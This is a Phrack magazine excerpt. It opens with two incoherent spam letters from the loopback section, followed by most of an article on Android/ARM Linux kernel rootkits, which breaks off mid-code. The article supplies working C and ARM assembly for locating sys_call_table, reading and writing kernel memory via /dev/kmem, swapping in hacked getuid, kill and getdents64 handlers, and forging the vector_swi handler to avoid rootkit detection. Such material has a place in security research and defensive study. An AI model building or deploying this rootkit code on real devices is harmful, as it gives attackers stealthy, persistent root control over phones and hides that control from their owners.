|
|
with SIG PRO Telecommunications softwares for NSA & CIA CT:qto let me know
|
|
about a should
|
|
|
|
Tchao with Respect-
|
|
Fabian.
|
|
|
|
[ What the fuck is that shit??? ]
|
|
|
|
---
|
|
|
|
From: John Smith <devils-advocate-666@live.com>
|
|
Subject: ANTISPAM
|
|
|
|
[ Hey it's you again! ]
|
|
|
|
Dear Phrack magazine,
|
|
Hello my name is SA John Smith, I'm from No Town, VA. but moved to
|
|
Brosnan, Missouri a few years back, and just recently moved to the huge
|
|
L.A.; but, I would like to discuss some about covering some articles
|
|
about Konkrete Jungle music parties and drum and bass massives done
|
|
internationally, to help promote Cypher Punks Ebb & Flo Garden's and
|
|
to help promote Covert Operations and Covert Actions for Cypher Punks,
|
|
Ninja Strike Force, CIA MK-ULTRA and Red Teaming financing and donation
|
|
sources to do shadowing, spike zones, drop deads, and some net working
|
|
for some brush offs of information, softwares, and to cache equipment
|
|
and personell at Squats (ie- abbandonned buildings, subway stations,
|
|
subterrainean tunnels, Ligne Imagineaux types of areas, beach houses,
|
|
Four Seasons Resort, casino's, Def Con Seminar, yahts, and other jungle
|
|
music parties and be for the U.S. like the Maquis- WWII French Resistance,
|
|
OSS, OAS, SIS, CSIS, CIA, Mossad, Shin Bet, NSA, and others from NATO and
|
|
U.S. Coalition Forces, and some U.N. Merc's and other types of PMCS's
|
|
Mercenaries for hire;) But, also covering atm hacking, to recieve cash
|
|
and Flow in Game Theory like doing Parkour tricks in Mirror's Edge for
|
|
Intelligence Analysis Red Team Well, I gotta go now, best wishes to you
|
|
all, and I'll contact you again, or better yet, just contact me with ai,
|
|
and we can meet up.
|
|
|
|
Tchao-
|
|
The Devils Advocate.
|
|
|
|
[ Spamming or brainfucked? ]
|
|
|
|
|--=[ EOF ]=-------------------------------------------------------------=|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x06 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------=[ Android platform based linux kernel rootkit ]=-----------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------------=[ dong-hoon you <x82@inetcop.org> ]=-----------------=|
|
|
|=------------------------=[ April 04th 2011 ]=--------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
--[ Contents
|
|
|
|
1 - Introduction
|
|
|
|
2 - Basic techniques for hooking
|
|
2.1 - Searching sys_call_table
|
|
2.2 - Identifying sys_call_table size
|
|
2.3 - Getting over the problem of structure size in kernel versions
|
|
2.4 - Treating version magic
|
|
|
|
3 - sys_call_table hooking through /dev/kmem access technique
|
|
|
|
4 - modifying sys_call_table handle code in vector_swi handler routine
|
|
|
|
5 - exception vector table modifying hooking techniques
|
|
5.1 - exception vector table
|
|
5.2 - Hooking techniques changing vector_swi handler
|
|
5.3 - Hooking techniques changing branch instruction offset
|
|
|
|
6 - Conclusion
|
|
|
|
7 - References
|
|
|
|
8 - Appendix: earthworm.tgz.uu
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
This paper covers rootkit techniques that can be used in linux kernel based
|
|
on Android platform using ARM(Advanced RISC Machine) process. All the tests
|
|
in this paper were performed in Motoroi XT720 model(2.6.29-omap1 kernel)
|
|
and Galaxy S SHW-M110S model(2.6.32.9 kernel). Note that some contents may
|
|
not apply to all smart platform machines and there are some bugs you can
|
|
modify.
|
|
|
|
We have seen various linux kernel hooking techniques of some pioneers([1]
|
|
[2][3][4][5]). Especially, I appreciate to Silvio Cesare and sd who
|
|
introduced and developed the /dev/kmem technique. Read the references for
|
|
more information.
|
|
|
|
In this paper, we are going to discuss a few hooking techniques.
|
|
|
|
1. Simple and traditional hooking technique using kmem device.
|
|
2. Traditional hooking technique changing sys_call_table offset in
|
|
vector_swi handler.
|
|
3. Two newly developed hooking techniques changing interrupt
|
|
service routine handler in exception vector table.
|
|
|
|
The main concepts of the techniques mentioned in this paper are 'smart' and
|
|
'simple'. This is because this paper focuses on hooking through modifying
|
|
the least kernel memory and by the simplest way. As the past good
|
|
techniques were, hooking must be possible freely before and after system
|
|
call.
|
|
|
|
This paper consists of eight parts and I tried to supply various examples
|
|
for readers' convenience by putting abundant appendices. The example codes
|
|
are written for ARM architecture, but if you modify some parts, you can use
|
|
them in the environment of ia32 architecture and even in the environment
|
|
that doesn't support LKM.
|
|
|
|
|
|
--[ 2 - Basic techniques for hooking
|
|
|
|
sys_call_table is a table which stores the addresses of low-level system
|
|
routines. Most of classical hooking techniques interrupt the sys_call_table
|
|
for some purposes. Because of this, some protection techniques such as
|
|
hiding symbol and moving to the field of read-only have been adapted to
|
|
protect sys_call_table from attackers. These protections, however,
|
|
can be easily removed if an attacker uses kmem device access technique.
|
|
To discuss other techniques making protection useless is beyond the purpose
|
|
of this paper.
|
|
|
|
|
|
--[ 2.1 - Searching sys_call_table
|
|
|
|
If sys_call_table symbol is not exported and there is no sys_call_table
|
|
information in kallsyms file which contains kernel symbol table
|
|
information, it will be difficult to get the sys_call_table address that
|
|
varies on each version of platform kernel. So, we need to research the way
|
|
to get the address of sys_call_table without symbol table information.
|
|
|
|
You can find the similar techniques in the web[10], but apart from this,
|
|
this paper is written to meet the Android platform on the way of testing.
|
|
|
|
|
|
--[ 2.1.1 - Getting sys_call_table address in vector_swi handler
|
|
|
|
At first, I will introduce the first two ways to get sys_call_table address
|
|
The code I will introduce here is written dependently in the interrupt
|
|
implementation of ARM process.
|
|
|
|
Generally, in the case of ARM process, when interrupt or exception happens,
|
|
it branches to the exception vector table. In that exception vector table,
|
|
there are exception hander addresses that match each exception handler
|
|
routines. The kernel of present Android platform uses high vector
|
|
(0xffff0000) and at the point of 0xffff0008, offset by 0x08, there is a 4
|
|
byte instruction to branch to the software interrupt handler. When the
|
|
instruction runs, the address of the software interrupt handler stored in
|
|
the address 0xffff0420, offset by 0x420, is called. See the section 5.1 for
|
|
more information.
|
|
|
|
void get_sys_call_table(){
|
|
void *swi_addr=(long *)0xffff0008;
|
|
unsigned long offset=0;
|
|
unsigned long *vector_swi_addr=0;
|
|
unsigned long sys_call_table=0;
|
|
|
|
offset=((*(long *)swi_addr)&0xfff)+8;
|
|
vector_swi_addr=*(unsigned long *)(swi_addr+offset);
|
|
|
|
while(vector_swi_addr++){
|
|
if(((*(unsigned long *)vector_swi_addr)&
|
|
0xfffff000)==0xe28f8000){
|
|
offset=((*(unsigned long *)vector_swi_addr)&
|
|
0xfff)+8;
|
|
sys_call_table=(void *)vector_swi_addr+offset;
|
|
break;
|
|
}
|
|
}
|
|
return;
|
|
}
|
|
|
|
At first, this code gets the address of vector_swi routine(software
|
|
interrupt process exception handler) in the exception vector table of high
|
|
vector and then, gets the address of a code that handles the
|
|
sys_call_table address. The followings are some parts of vector_swi handler
|
|
code.
|
|
|
|
000000c0 <vector_swi>:
|
|
c0: e24dd048 sub sp, sp, #72 ; 0x48 (S_FRAME_SIZE)
|
|
c4: e88d1fff stmia sp, {r0 - r12} ; Calling r0 - r12
|
|
c8: e28d803c add r8, sp, #60 ; 0x3c (S_PC)
|
|
cc: e9486000 stmdb r8, {sp, lr}^ ; Calling sp, lr
|
|
d0: e14f8000 mrs r8, SPSR ; called from non-FIQ mode, so ok.
|
|
d4: e58de03c str lr, [sp, #60] ; Save calling PC
|
|
d8: e58d8040 str r8, [sp, #64] ; Save CPSR
|
|
dc: e58d0044 str r0, [sp, #68] ; Save OLD_R0
|
|
e0: e3a0b000 mov fp, #0 ; 0x0 ; zero fp
|
|
e4: e3180020 tst r8, #32 ; 0x20 ; this is SPSR from save_user_regs
|
|
e8: 12877609 addne r7, r7, #9437184; put OS number in
|
|
ec: 051e7004 ldreq r7, [lr, #-4]
|
|
f0: e59fc0a8 ldr ip, [pc, #168] ; 1a0 <__cr_alignment>
|
|
f4: e59cc000 ldr ip, [ip]
|
|
f8: ee01cf10 mcr 15, 0, ip, cr1, cr0, {0} ; update control register
|
|
fc: e321f013 msr CPSR_c, #19 ; 0x13 enable_irq
|
|
100: e1a096ad mov r9, sp, lsr #13 ; get_thread_info tsk
|
|
104: e1a09689 mov r9, r9, lsl #13
|
|
[*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer
|
|
10c: e599c000 ldr ip, [r9] ; check for syscall tracing
|
|
|
|
The asterisk part is the code of sys_call_table. This code notifies the
|
|
start of sys_call_table at the appointed offset from the present pc
|
|
address. So, we can get the offset value to figure out the position of
|
|
sys_call_table if we can find opcode pattern corresponding to "add r8, pc"
|
|
instruction.
|
|
|
|
opcode: 0xe28f8???
|
|
|
|
if(((*(unsigned long *)vector_swi_addr)&0xfffff000)==0xe28f8000){
|
|
offset=((*(unsigned long *)vector_swi_addr)&0xfff)+8;
|
|
sys_call_table=(void *)vector_swi_addr+offset;
|
|
break;
|
|
|
|
From this, we can get the address of sys_call_table handled in
|
|
vector_swi handler routine. And there is an easier way to do this.
|
|
|
|
|
|
--[ 2.1.2 - Finding sys_call_table addr through sys_close addr searching
|
|
|
|
The second way to get the address of sys_call_table is simpler than the way
|
|
introduced in 2.1.1. This way is to find the address by using the fact that
|
|
sys_close address, with open symbol, is in 0x6 offset from the starting
|
|
point of sys_call_table.
|
|
|
|
... the same vector_swi address searching routine parts omitted ...
|
|
|
|
while(vector_swi_addr++){
|
|
if(*(unsigned long *)vector_swi_addr==&sys_close){
|
|
sys_call_table=(void *)vector_swi_addr-(6*4);
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
By using the fact that sys_call_table resides after vector_swi handler
|
|
address, we can search the sys_close which is appointed as the sixth system
|
|
call of sys_table_call.
|
|
|
|
fs/open.c:
|
|
EXPORT_SYMBOL(sys_close);
|
|
...
|
|
|
|
call.S:
|
|
/* 0 */ CALL(sys_restart_syscall)
|
|
CALL(sys_exit)
|
|
CALL(sys_fork_wrapper)
|
|
CALL(sys_read)
|
|
CALL(sys_write)
|
|
/* 5 */ CALL(sys_open)
|
|
CALL(sys_close)
|
|
|
|
This searching way has a technical disadvantage that we must get the
|
|
sys_close kernel symbol address beforehand if it's implemented in user
|
|
mode.
|
|
|
|
|
|
--[ 2.2 - Identifying sys_call_table size
|
|
|
|
The hooking technique which will be introduced in section 4 changes the
|
|
sys_call_table handle code within vector_swi handler. It generates the copy
|
|
of the existing sys_call_table in the heap memory. Because the size of
|
|
sys_call_table varies in each platform kernel version, we need a precise
|
|
size of sys_call_table to generate a copy.
|
|
|
|
... the same vector_swi address searching routine parts omitted ...
|
|
|
|
while(vector_swi_addr++){
|
|
if(((*(unsigned long *)vector_swi_addr)&
|
|
0xffff0000)==0xe3570000){
|
|
i=0x10-(((*(unsigned long *)vector_swi_addr)&
|
|
0xff00)>>8);
|
|
size=((*(unsigned long *)vector_swi_addr)&
|
|
0xff)<<(2*i);
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
This code searches code which controls the size of sys_call_table within
|
|
vector_swi routine and then gets the value, the size of sys_call_table.
|
|
The following code determines the size of sys_call_table, and it makes a
|
|
part of a function that calls system call saved in sys_call_table.
|
|
|
|
118: e92d0030 stmdb sp!, {r4, r5} ; push fifth and sixth args
|
|
11c: e31c0c01 tst ip, #256 ; are we tracing syscalls?
|
|
120: 1a000008 bne 148 <__sys_trace>
|
|
[*]124: e3570f5b cmp r7, #364 ; check upper syscall limit
|
|
128: e24fee13 sub lr, pc, #304 ; return address
|
|
12c: 3798f107 ldrcc pc, [r8, r7, lsl #2] ; call sys_* routine
|
|
|
|
The asterisk part compares the size of sys_call_table. This code checks if
|
|
the r7 register value which contains system call number is bigger than
|
|
syscall limit. So, if we search opcode pattern(0xe357????) corresponding to
|
|
"cmp r7", we can get the exact size of sys_call_table. For your
|
|
information, all of the offset values can be obtained by using ARM
|
|
architecture operand counting method.
|
|
|
|
|
|
--[ 2.3 - Getting over the problem of structure size in kernel versions
|
|
|
|
Even if you are using the same version of kernels, the size of structure
|
|
varies according to the compile environments and config options. Thus, if
|
|
we use a wrong structure with a wrong size, it is not likely to work as we
|
|
expect. To prevent errors caused by the difference of structure offset and
|
|
to enable our code to work in various kernel environments, we need to build
|
|
a function which gets the offset needed from the structure.
|
|
|
|
void find_offset(void){
|
|
unsigned char *init_task_ptr=(char *)&init_task;
|
|
int offset=0,i;
|
|
char *ptr=0;
|
|
|
|
/* getting the position of comm offset
|
|
within task_struct structure */
|
|
for(i=0;i<0x600;i++){
|
|
if(init_task_ptr[i]=='s'&&init_task_ptr[i+1]=='w'&&
|
|
init_task_ptr[i+2]=='a'&&init_task_ptr[i+3]=='p'&&
|
|
init_task_ptr[i+4]=='p'&&init_task_ptr[i+5]=='e'&&
|
|
init_task_ptr[i+6]=='r'){
|
|
comm_offset=i;
|
|
break;
|
|
}
|
|
}
|
|
/* getting the position of tasks.next offset
|
|
within task_struct structure */
|
|
init_task_ptr+=0x50;
|
|
for(i=0x50;i<0x300;i+=4,init_task_ptr+=4){
|
|
offset=*(long *)init_task_ptr;
|
|
if(offset&&offset>0xc0000000){
|
|
offset-=i;
|
|
offset+=comm_offset;
|
|
if(strcmp((char *)offset,"init")){
|
|
continue;
|
|
} else {
|
|
next_offset=i;
|
|
|
|
/* getting the position of parent offset
|
|
within task_struct structure */
|
|
for(;i<0x300;i+=4,init_task_ptr+=4){
|
|
offset=*(long *)init_task_ptr;
|
|
if(offset&&offset>0xc0000000){
|
|
offset+=comm_offset;
|
|
if(strcmp
|
|
((char *)offset,"swapper"))
|
|
{
|
|
continue;
|
|
} else {
|
|
parent_offset=i+4;
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
/* getting the position of cred offset
|
|
within task_struct structure */
|
|
init_task_ptr=(char *)&init_task;
|
|
init_task_ptr+=comm_offset;
|
|
for(i=0;i<0x50;i+=4,init_task_ptr-=4){
|
|
offset=*(long *)init_task_ptr;
|
|
if(offset&&offset>0xc0000000&&offset<0xd0000000&&
|
|
offset==*(long *)(init_task_ptr-4)){
|
|
ptr=(char *)offset;
|
|
if(*(long *)&ptr[4]==0&&
|
|
*(long *)&ptr[8]==0&&
|
|
*(long *)&ptr[12]==0&&
|
|
*(long *)&ptr[16]==0&&
|
|
*(long *)&ptr[20]==0&&
|
|
*(long *)&ptr[24]==0&&
|
|
*(long *)&ptr[28]==0&&
|
|
*(long *)&ptr[32]==0){
|
|
cred_offset=i;
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
/* getting the position of pid offset
|
|
within task_struct structure */
|
|
pid_offset=parent_offset-0xc;
|
|
|
|
return;
|
|
}
|
|
|
|
This code gets the information of PCB(process control block) using some
|
|
features that can be used as patterns of task_struct structure.
|
|
|
|
First, we need to search init_task for the process name "swapper" to find
|
|
out address of "comm" variable within task_struct structure created before
|
|
init process. Then, we search for "next" pointer from "tasks" which is a
|
|
linked list of process structure. Finally, we use "comm" variable to figure
|
|
out whether the process has a name of "init". If it does, we get the offset
|
|
address of "next" pointer.
|
|
|
|
include/linux/sched.h:
|
|
struct task_struct {
|
|
...
|
|
struct list_head tasks;
|
|
...
|
|
pid_t pid;
|
|
...
|
|
struct task_struct *real_parent; /* real parent process */
|
|
struct task_struct *parent; /* recipient of SIGCHLD,
|
|
wait4() reports */
|
|
...
|
|
const struct cred *real_cred; /* objective and
|
|
real subjective task
|
|
* credentials (COW) */
|
|
const struct cred *cred; /* effective (overridable)
|
|
subjective task */
|
|
struct mutex cred_exec_mutex; /* execve vs ptrace cred
|
|
calculation mutex */
|
|
|
|
char comm[TASK_COMM_LEN]; /* executable name ... */
|
|
|
|
After this, we get the parent pointer by checking some pointers. And if
|
|
this is a right parent pointer, it has the name of previous task(init_task)
|
|
process, swapper. The reason we search the address of parent pointer is to
|
|
get the offset of pid variable by using a parent offset as a base point.
|
|
|
|
To get the position of cred structure pointer related with task privilege,
|
|
we perform backward search from the point of comm variable and check if the
|
|
id of each user is 0.
|
|
|
|
|
|
--[ 2.4 - Treating version magic
|
|
|
|
Check the whitepaper[11] of Christian Papathanasiou and Nicholas J. Percoco
|
|
in Defcon 18. The paper introduces the way of treating version magic by
|
|
modifying the header of utsrelease.h when we compile LKM rootkit module.
|
|
In fact, I have used a tool which overwrites the vermagic value of compiled
|
|
kernel module binary directly before they presented.
|
|
|
|
|
|
--[ 3 - sys_call_table hooking through /dev/kmem access technique
|
|
|
|
I hope you take this section as a warming-up. If you want to know more
|
|
detailed background knowledge about /dev/kmem access technique, check the
|
|
"Run-time kernel patching" by Silvio and "Linux on-the-fly kernel patching
|
|
without LKM" by sd.
|
|
|
|
At least until now, the root privilege of access to /dev/kmem device within
|
|
linux kernel in Android platform is allowed. So, it is possible to move
|
|
through lseek() and to read through read(). Newly written /dev/kmem access
|
|
routines are as follows.
|
|
|
|
#define MAP_SIZE 4096UL
|
|
#define MAP_MASK (MAP_SIZE - 1)
|
|
|
|
int kmem;
|
|
|
|
/* read data from kmem */
|
|
void read_kmem(unsigned char *m,unsigned off,int sz)
|
|
{
|
|
int i;
|
|
void *buf,*v_addr;
|
|
|
|
if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
|
|
MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
|
|
perror("read: mmap error");
|
|
exit(0);
|
|
}
|
|
for(i=0;i<sz;i++){
|
|
v_addr=buf+(off&MAP_MASK)+i;
|
|
m[i]=*((unsigned char *)v_addr);
|
|
}
|
|
if(munmap(buf,MAP_SIZE*2)==-1){
|
|
perror("read: munmap error");
|
|
exit(0);
|
|
}
|
|
return;
|
|
}
|
|
|
|
/* write data to kmem */
|
|
void write_kmem(unsigned char *m,unsigned off,int sz)
|
|
{
|
|
int i;
|
|
void *buf,*v_addr;
|
|
|
|
if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
|
|
MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
|
|
perror("write: mmap error");
|
|
exit(0);
|
|
}
|
|
for(i=0;i<sz;i++){
|
|
v_addr=buf+(off&MAP_MASK)+i;
|
|
*((unsigned char *)v_addr)=m[i];
|
|
}
|
|
if(munmap(buf,MAP_SIZE*2)==-1){
|
|
perror("write: munmap error");
|
|
exit(0);
|
|
}
|
|
return;
|
|
}
|
|
|
|
This code makes the kernel memory address we want shared with user memory
|
|
area as much as the size of two pages and then we can read and write the
|
|
kernel by reading and writing on the shared memory. Even though the
|
|
searched sys_call_table is allocated in read-only area, we can simply
|
|
modify the contents of sys_call_table through /dev/kmem access technique.
|
|
The example of hooking through sys_call_table modification is as follows.
|
|
|
|
kmem=open("/dev/kmem",O_RDWR|O_SYNC);
|
|
if(kmem<0){
|
|
return 1;
|
|
}
|
|
...
|
|
if(c=='I'||c=='i'){ /* install */
|
|
addr_ptr=(char *)get_kernel_symbol("hacked_getuid");
|
|
write_kmem((char *)&addr_ptr,addr+__NR_GETUID*4,4);
|
|
addr_ptr=(char *)get_kernel_symbol("hacked_writev");
|
|
write_kmem((char *)&addr_ptr,addr+__NR_WRITEV*4,4);
|
|
addr_ptr=(char *)get_kernel_symbol("hacked_kill");
|
|
write_kmem((char *)&addr_ptr,addr+__NR_KILL*4,4);
|
|
addr_ptr=(char *)get_kernel_symbol("hacked_getdents64");
|
|
write_kmem((char *)&addr_ptr,addr+__NR_GETDENTS64*4,4);
|
|
} else if(c=='U'||c=='u'){ /* uninstall */
|
|
...
|
|
}
|
|
close(kmem);
|
|
|
|
The attack code can be compiled in the mode of LKM module and general ELF32
|
|
executable file format.
|
|
|
|
|
|
--[ 4 - modifying sys_call_table handle code in vector_swi handler routine
|
|
|
|
The techniques introduced in section 3 are easily detected by rootkit
|
|
detection tools. So, some pioneers have researched the ways which modify
|
|
some parts of exception handler function processing software interrupt.
|
|
The technique introduced in this section generates a copy version of
|
|
sys_call_table in kernel heap memory without modifying the
|
|
sys_call_table directly.
|
|
|
|
static void *hacked_sys_call_table[500];
|
|
static void **sys_call_table;
|
|
int sys_call_table_size;
|
|
...
|
|
|
|
int init_module(void){
|
|
...
|
|
get_sys_call_table(); // position and size of sys_call_table
|
|
memcpy(hacked_sys_call_table,sys_call_table,sys_call_table_size*4);
|
|
|
|
After generating this copy version, we have to modify some parts of
|
|
sys_call_table processed within vector_swi handler routine. It is because
|
|
sys_call_table is handled as a offset, not an address. It is a feature that
|
|
separates ARM architecture from ia32 architecture.
|
|
|
|
code before compile:
|
|
ENTRY(vector_swi)
|
|
...
|
|
get_thread_info tsk
|
|
adr tbl, sys_call_table ; load syscall table pointer
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> code of sys_call_table
|
|
ldr ip, [tsk, #TI_FLAGS] ; @ check for syscall tracing
|
|
|
|
code after compile:
|
|
000000c0 <vector_swi>:
|
|
...
|
|
100: e1a096ad mov r9, sp, lsr #13 ; get_thread_info tsk
|
|
104: e1a09689 mov r9, r9, lsl #13
|
|
[*]108: e28f8094 add r8, pc, #148 ; load syscall table pointer
|
|
~~~~~~~~~~~~~~~~~~~~
|
|
+-> deal sys_call_table as relative offset
|
|
10c: e599c000 ldr ip, [r9] ; check for syscall tracing
|
|
|
|
So, I contrived a hooking technique modifying "add r8, pc, #offset" code
|
|
itself like this.
|
|
|
|
before modifying: e28f80?? add r8, pc, #??
|
|
after modifying: e59f80?? ldr r8, [pc, #??]
|
|
|
|
These instructions get the address of sys_call_table at the specified
|
|
offset from the present pc address and then store it in r8 register. As a
|
|
result, the address of sys_call_table is stored in r8 register. Now, we
|
|
have to make a separated space to store the address of sys_call_table copy
|
|
near the processing routine. After some consideration, I decided to
|
|
overwrite nop code of other function's epilogue near vector_swi handler.
|
|
|
|
00000174 <__sys_trace_return>:
|
|
174: e5ad0008 str r0, [sp, #8]!
|
|
178: e1a02007 mov r2, r7
|
|
17c: e1a0100d mov r1, sp
|
|
180: e3a00001 mov r0, #1 ; 0x1
|
|
184: ebfffffe bl 0 <syscall_trace>
|
|
188: eaffffb1 b 54 <ret_to_user>
|
|
[*]18c: e320f000 nop {0}
|
|
~~~~~~~~ -> position to overwrite the copy of sys_call_table
|
|
190: e320f000 nop {0}
|
|
...
|
|
|
|
000001a0 <__cr_alignment>:
|
|
1a0: 00000000 ....
|
|
|
|
000001a4 <sys_call_table>:
|
|
|
|
Now, if we count the offset from the address of sys_call_table to the
|
|
address overwritten with the address of sys_call_table copy and then modify
|
|
code, we can use the table we copied whenever system call is called. The
|
|
hooking code modifying some parts of vector_swi handling routine and nop
|
|
code near the address of sys_call_table is as follows:
|
|
|
|
void install_hooker(){
|
|
void *swi_addr=(long *)0xffff0008;
|
|
unsigned long offset=0;
|
|
unsigned long *vector_swi_addr=0,*ptr;
|
|
unsigned char buf[MAP_SIZE+1];
|
|
unsigned long modify_addr1=0;
|
|
unsigned long modify_addr2=0;
|
|
unsigned long addr=0;
|
|
char *addr_ptr;
|
|
|
|
offset=((*(long *)swi_addr)&0xfff)+8;
|
|
vector_swi_addr=*(unsigned long *)(swi_addr+offset);
|
|
|
|
memset((char *)buf,0,sizeof(buf));
|
|
read_kmem(buf,(long)vector_swi_addr,MAP_SIZE);
|
|
ptr=(unsigned long *)buf;
|
|
|
|
/* get the address of ldr that handles sys_call_table */
|
|
while(ptr){
|
|
if(((*(unsigned long *)ptr)&0xfffff000)==0xe28f8000){
|
|
modify_addr1=(unsigned long)vector_swi_addr;
|
|
break;
|
|
}
|
|
ptr++;
|
|
vector_swi_addr++;
|
|
}
|
|
/* get the address of nop that will be overwritten */
|
|
while(ptr){
|
|
if(*(unsigned long *)ptr==0xe320f000){
|
|
modify_addr2=(unsigned long)vector_swi_addr;
|
|
break;
|
|
}
|
|
ptr++;
|
|
vector_swi_addr++;
|
|
}
|
|
|
|
/* overwrite nop with hacked_sys_call_table */
|
|
addr_ptr=(char *)get_kernel_symbol("hacked_sys_call_table");
|
|
write_kmem((char *)&addr_ptr,modify_addr2,4);
|
|
|
|
/* calculate fake table offset */
|
|
offset=modify_addr2-modify_addr1-8;
|
|
|
|
/* change sys_call_table offset into fake table offset */
|
|
addr=0xe59f8000+offset; /* ldr r8, [pc, #offset] */
|
|
addr_ptr=(char *)addr;
|
|
write_kmem((char *)&addr_ptr,modify_addr1,4);
|
|
|
|
return;
|
|
}
|
|
|
|
This code gets the address of the code that handles sys_call_table within
|
|
vector_swi handler routine, and then finds nop code around and stores the
|
|
address of hacked_sys_call_table which is a copy version of sys_call_table.
|
|
After this, we get the sys_call_table handle code from the offset in which
|
|
hacked_sys_call_table resides and then hooking starts.
|
|
|
|
|
|
--[ 5 - exception vector table modifying hooking techniques
|
|
|
|
This section discusses two hooking techniques, one is the hooking technique
|
|
which changes the address of software interrupt exception handler routine
|
|
within exception vector table and the other is the technique which changes
|
|
the offset of code branching to vector_swi handler. The purpose of these
|
|
two techniques is to implement the hooking technique that modifies only
|
|
exception vector table without changing sys_call_table and vector_swi
|
|
handler.
|
|
|
|
|
|
--[ 5.1 - exception vector table
|
|
|
|
Exception vector table contains the address of various exception handler
|
|
routines, branch code array and processing codes to call the exception
|
|
handler routine. These are declared in entry-armv.S, copied to the point of
|
|
the high vector(0xffff0000) by early_trap_init() routine within traps.c
|
|
code, and make one exception vector table.
|
|
|
|
traps.c:
|
|
void __init early_trap_init(void)
|
|
{
|
|
unsigned long vectors = CONFIG_VECTORS_BASE; /* 0xffff0000 */
|
|
extern char __stubs_start[], __stubs_end[];
|
|
extern char __vectors_start[], __vectors_end[];
|
|
extern char __kuser_helper_start[], __kuser_helper_end[];
|
|
int kuser_sz = __kuser_helper_end - __kuser_helper_start;
|
|
|
|
/*
|
|
* Copy the vectors, stubs and kuser helpers
|
|
(in entry-armv.S)
|
|
* into the vector page, mapped at 0xffff0000,
|
|
and ensure these
|
|
* are visible to the instruction stream.
|
|
*/
|
|
memcpy((void *)vectors, __vectors_start,
|
|
__vectors_end - __vectors_start);
|
|
memcpy((void *)vectors + 0x200, __stubs_start,
|
|
__stubs_end - __stubs_start);
|
|
|
|
After the processing codes are copied in order by early_trap_init()
|
|
routine, the exception vector table is initialized, then one exception
|
|
vector table is made as follows.
|
|
|
|
# ./coelacanth -e
|
|
[000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch code array
|
|
[004] ffff0004: ea0000dd [Undef] ; b 0x380
|
|
[008] ffff0008: e59ff410 [SWI] ; ldr pc, [pc, #1040] ; 0x420
|
|
[00c] ffff000c: ea0000bb [Abort-perfetch] ; b 0x300
|
|
[010] ffff0010: ea00009a [Abort-data] ; b 0x280
|
|
[014] ffff0014: ea0000fa [Reserved] ; b 0x404
|
|
[018] ffff0018: ea000078 [IRQ] ; b 0x608
|
|
[01c] ffff001c: ea0000f7 [FIQ] ; b 0x400
|
|
[020] Reserved
|
|
... skip ...
|
|
[22c] ffff022c: c003dbc0 [__irq_usr] ; exception handler routine addr array
|
|
[230] ffff0230: c003d920 [__irq_invalid]
|
|
[234] ffff0234: c003d920 [__irq_invalid]
|
|
[238] ffff0238: c003d9c0 [__irq_svc]
|
|
[23c] ffff023c: c003d920 [__irq_invalid]
|
|
...
|
|
[420] ffff0420: c003df40 [vector_swi]
|
|
|
|
When software interrupt occurs, 4 byte instruction at 0xffff0008 is
|
|
executed. The code copies the present pc to the address of exception
|
|
handler and then branches. In other words, it branches to the vector_swi
|
|
handler routine at 0x420 of exception vector table.
|
|
|
|
|
|
--[ 5.2 - Hooking techniques changing vector_swi handler
|
|
|
|
The hooking technique changing the vector_swi handler is the first one that
|
|
will be introduced. It changes the address of exception handler routine
|
|
that processes software interrupt within exception vector table and calls
|
|
the vector_swi handler routine forged by an attacker.
|
|
|
|
1. Generate the copy version of sys_call_table in kernel heap and
|
|
then change the address of routine as aforementioned.
|
|
2. Copy not all vector_swi handler routine but the code before
|
|
handling sys_call_table to kernel heap for simple hooking.
|
|
3. Fill the values with right values for the copied fake vector_swi
|
|
handler routine to act normally and change the code to call the
|
|
address of sys_call_table copy version. (generated in step 1)
|
|
4. Jump to the next position of sys_call_table handle code of
|
|
original vector_swi handler routine.
|
|
5. Change the address of vector_swi handler routine of exception
|
|
vector table to the address of fake vector_swi handler code.
|
|
|
|
The completed fake vector_swi handler has a code like following.
|
|
|
|
00000000 <new_vector_swi>:
|
|
00: e24dd048 sub sp, sp, #72 ; 0x48
|
|
04: e88d1fff stmia sp, {r0 - r12}
|
|
08: e28d803c add r8, sp, #60 ; 0x3c
|
|
0c: e9486000 stmdb r8, {sp, lr}^
|
|
10: e14f8000 mrs r8, SPSR
|
|
14: e58de03c str lr, [sp, #60]
|
|
18: e58d8040 str r8, [sp, #64]
|
|
1c: e58d0044 str r0, [sp, #68]
|
|
20: e3a0b000 mov fp, #0 ; 0x0
|
|
24: e3180020 tst r8, #32 ; 0x20
|
|
28: 12877609 addne r7, r7, #9437184
|
|
2c: 051e7004 ldreq r7, [lr, #-4]
|
|
[*]30: e59fc020 ldr ip, [pc, #32] ; 0x58 <__cr_alignment>
|
|
34: e59cc000 ldr ip, [ip]
|
|
38: ee01cf10 mcr 15, 0, ip, cr1, cr0, {0}
|
|
3c: f1080080 cpsie i
|
|
40: e1a096ad mov r9, sp, lsr #13
|
|
44: e1a09689 mov r9, r9, lsl #13
|
|
[*]48: e59f8000 ldr r8, [pc, #0]
|
|
[*]4c: e59ff000 ldr pc, [pc, #0]
|
|
[*]50: <hacked_sys_call_table address>
|
|
[*]54: <vector_swi address to jmp>
|
|
[*]58: <__cr_alignment routine address referring at 0x30>
|
|
|
|
The asterisk parts are the codes modified or added to the original code. In
|
|
addition to the part that we modified to make the code refer __cr_alignment
|
|
function, I added some instructions to save address of sys_call_table copy
|
|
version to r8 register, and jump back to the original vector_swi handler
|
|
function. Following is the attack code written as a kernel module.
|
|
|
|
static unsigned char new_vector_swi[500];
|
|
...
|
|
|
|
void make_new_vector_swi(){
|
|
